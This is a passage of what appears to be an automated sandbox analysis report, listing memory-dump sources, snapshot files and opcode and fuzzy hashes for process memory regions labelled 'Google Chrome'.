                                                    • Opcode Fuzzy Hash: 2718f2b3590d6c15207c7a73f7b5cbd7acbdb3fb875aa02d7d36613a3a5c1fba
                                                    • Instruction Fuzzy Hash: C231A0B5B18A0E4FEB54EBA8D8B52FD7BB1FF89311F540579D109D3282CE38A8418780
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2818494624.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62f8e4ac94155bc7c6b240e96ced63ff15c7b893470c7154be72351ea9b6471a
                                                    • Instruction ID: 490e074134c5656e18dfc2117e2dbd752b38f8ed5f2a970b888bc4e6de01ab1b
                                                    • Opcode Fuzzy Hash: 62f8e4ac94155bc7c6b240e96ced63ff15c7b893470c7154be72351ea9b6471a
                                                    • Instruction Fuzzy Hash: F231F4B5B4E6894FDB55DBA898B11A97FA1FF86300B4440BAD44CC7397CE386D0087C1
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2818494624.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 614be772ffc060606d1b1829097b63d7464dc509ec290ea1c1523bdbd1053e91
                                                    • Instruction ID: 6347862188ef4a6d5437bb842a785358701f54ab3fa795b126eddeaa5cc83054
                                                    • Opcode Fuzzy Hash: 614be772ffc060606d1b1829097b63d7464dc509ec290ea1c1523bdbd1053e91
                                                    • Instruction Fuzzy Hash: 7721E2B5B9D50E4FDB58EFA8C0B55A97FA1FF89300B849574D40DD3386CE3869018781
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2818494624.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0397cf2bbe4ccf0142838f219a97e10057c42702f6316b9bf9252208a17f8cb
                                                    • Instruction ID: 2705f5f4aaa5157514eff8786d48a2b9a2cc6daefcadf4238221c26222137d02
                                                    • Opcode Fuzzy Hash: e0397cf2bbe4ccf0142838f219a97e10057c42702f6316b9bf9252208a17f8cb
                                                    • Instruction Fuzzy Hash: DA012695E0D7808FE742A73858B54727FF09F97340B0804ABE889CB1A7DE586944D3D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4O_^$5O_^
                                                    • API String ID: 0-3220362026
                                                    • Opcode ID: 2293cc6b907d708c797261696714ca8d743ab9e7edb262bed5a87792b27ca472
                                                    • Instruction ID: 49ef08c0c914f8f8ac28daaa4cd9b245a92ef689199f334ecd9183eeaac11469
                                                    • Opcode Fuzzy Hash: 2293cc6b907d708c797261696714ca8d743ab9e7edb262bed5a87792b27ca472
                                                    • Instruction Fuzzy Hash: 09C1E527B0D5A21BE711B7FCA4B11EA3B64DF82325B0C51B7D28DDF193ED2874468290
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f32e9aa3215f09ff92c94c991fe830c8637272faa2fe9288e987eb5236e403b
                                                    • Instruction ID: a991f421b2082f232d62dca59b410706ba8ef2903839e4169e77cdf063ed269a
                                                    • Opcode Fuzzy Hash: 9f32e9aa3215f09ff92c94c991fe830c8637272faa2fe9288e987eb5236e403b
                                                    • Instruction Fuzzy Hash: FB51C31170DAC60FE796A7B898692A57FD2DF8B210B0901FBE08DCB2A7CD595C068312
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e586eb7c1d91e2a94b53f2c0d2be20f83de31a6c6a9bd4ea2ebbfdc92a5836a9
                                                    • Instruction ID: 164f17b670e53bd2088e7196a3545f25e94a72ef4b63d7f9a84f46f82a51717a
                                                    • Opcode Fuzzy Hash: e586eb7c1d91e2a94b53f2c0d2be20f83de31a6c6a9bd4ea2ebbfdc92a5836a9
                                                    • Instruction Fuzzy Hash: C9229231B18D498FEBA8F7A884B56A977D2FF99314F540179E40ED32D2DE3DA8018781
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc6c24ad263af9e271af1ae0eb72e05e895d830133a1bebfa86d09211874cea3
                                                    • Instruction ID: 4a17d9b95e06d0b86878a3272ed63f2d56b853600de278f2a0422f10bbf51b88
                                                    • Opcode Fuzzy Hash: cc6c24ad263af9e271af1ae0eb72e05e895d830133a1bebfa86d09211874cea3
                                                    • Instruction Fuzzy Hash: CC418026A0DA965FE752E7B888B21EA7FB0EF42314B0800B7D189DB1D3DD2C68069351
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 499f1ac79b4d4cb4fdece446d11a422381b027c2ce8b889f285249a51ca6d8ef
                                                    • Instruction ID: ebaa81bc2f1eb1d48c9c4567efad745afcee7912ffe7d95cfdb64bc0f031c32d
                                                    • Opcode Fuzzy Hash: 499f1ac79b4d4cb4fdece446d11a422381b027c2ce8b889f285249a51ca6d8ef
                                                    • Instruction Fuzzy Hash: BEF18221B18D5A8FE7A8E76884B57A967D2FF99314F440179E00ED32D7DE3DAC019780
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31ef543a7a7943fb7491d8c530647bdce792927fe030b361a715b81a05c536cd
                                                    • Instruction ID: 1ae769ab1c205aa1d45fe06bb1b0d0a1a5fdaf1d0b313bca1c8d682c18ea9d52
                                                    • Opcode Fuzzy Hash: 31ef543a7a7943fb7491d8c530647bdce792927fe030b361a715b81a05c536cd
                                                    • Instruction Fuzzy Hash: 1C510821B0EA864FF366A77858662797BD1EF87310B0841BAD48DC72D7DD5CAC428341
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 638378fa74d564f35988ae532a54d6b9c943e6ff68f00edc762e176388527e6e
                                                    • Instruction ID: fb1ee1d4e6d901acafae2c8c9e27317c77a22c8db5b1c5b2d02c4c95e6d8adf7
                                                    • Opcode Fuzzy Hash: 638378fa74d564f35988ae532a54d6b9c943e6ff68f00edc762e176388527e6e
                                                    • Instruction Fuzzy Hash: B431A321B1C9494FF798EB6C94AA779B6C2EBD9315F0405BEE04EC32A7DD68AC418341
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9980e24ea02080bc158faf30201898e1d087d6d3fd87004f2a3d9153791b5ac5
                                                    • Instruction ID: d3e4466372ca60d2243eaa5e8c1498762b9ed87e8eb729b7297c6456cea5db10
                                                    • Opcode Fuzzy Hash: 9980e24ea02080bc158faf30201898e1d087d6d3fd87004f2a3d9153791b5ac5
                                                    • Instruction Fuzzy Hash: 21318561B18A4A4FE754ABBC486A3BD77D5EF9A311F14417AE00DC32D3DE2CA8418791
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a11c15df3389de4c324be408fe593c1c8b9b802f5de844e8913e6fc4ceba882
                                                    • Instruction ID: 36834f65fd1fd460517630e6911b9e51cff970ba9cddac6f590682ee38b63a02
                                                    • Opcode Fuzzy Hash: 6a11c15df3389de4c324be408fe593c1c8b9b802f5de844e8913e6fc4ceba882
                                                    • Instruction Fuzzy Hash: 04319F35B18A0E8FEB54EBA8C8B52ED77F1FF89310F544579D109D3282CE39A8418780
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8cb526fa1647f19316754d8892294d1afd19288f20b2359f3c89cea21f7ffce
                                                    • Instruction ID: 699453a0b87004dc85b75b388ae2e3a7b360aa2eefe4585c117f5ce3c5dd9c96
                                                    • Opcode Fuzzy Hash: f8cb526fa1647f19316754d8892294d1afd19288f20b2359f3c89cea21f7ffce
                                                    • Instruction Fuzzy Hash: B431E424B0DA8E4FD395EBA848B51A97FE1EF86204B5490FAD44CD7797CA39690087C1
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 771d0a17bb69d4def07516610504095c2615ba6d5bb651f811b4dc774c6f501d
                                                    • Instruction ID: 48317f1fefca3513296c3db741a7d54d82f28e3ab9448ba22fa3ef507f18644b
                                                    • Opcode Fuzzy Hash: 771d0a17bb69d4def07516610504095c2615ba6d5bb651f811b4dc774c6f501d
                                                    • Instruction Fuzzy Hash: 6821D134B1898E8FD394FBA880B55A97BE1FF89304B9491B5D40DD3786CF386A118BC1
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2891993468.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 371ec345670be9a2f53355e9b7b847d463163efae79c575f6cfdefb9914b3ffc
                                                    • Instruction ID: df191f30d38e30c1abbaea55810836cfa993a2377b53c85357556b62a6511896
                                                    • Opcode Fuzzy Hash: 371ec345670be9a2f53355e9b7b847d463163efae79c575f6cfdefb9914b3ffc
                                                    • Instruction Fuzzy Hash: C6012654E0DBD48FF742AB3848B54727FE09F93300B0804EAEC89C60E7DA1CAA409383